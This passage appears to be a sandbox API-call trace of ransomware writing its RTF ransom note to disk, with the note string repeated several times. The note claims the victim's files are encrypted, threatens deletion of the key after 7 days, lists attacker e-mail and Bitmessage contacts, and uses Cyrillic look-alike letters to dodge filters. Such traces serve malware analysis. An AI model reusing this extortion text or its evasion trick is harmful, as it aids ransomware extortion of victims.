br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.898] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.898] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nûê9ÿâ\x8c\x9b\x8b­¹Åü\x03§#-*\n5\x90W\x1e\x1fc\x9e", lpUsedDefaultChar=0x0) returned 8717 [0295.898] WriteFile (in: hFile=0x2ec, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.898] CloseHandle (hObject=0x2ec) returned 1 [0295.898] GetFileAttributesW 